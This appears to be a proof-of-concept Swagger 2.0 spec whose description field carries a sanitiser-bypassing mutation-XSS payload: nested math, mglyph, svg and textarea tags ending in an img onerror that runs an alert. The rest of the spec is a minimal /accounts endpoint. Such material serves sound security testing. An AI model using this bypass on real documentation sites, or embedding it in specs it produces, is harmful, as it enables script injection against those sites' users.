swagger: '2.0'
info:
  title: Example yaml.spec
  version: '1'
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert(JSON.stringify(versions)) src=1>"></form>
paths:
  /accounts:
    get:
      responses:
        '200':
          descrition: No response was specified
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts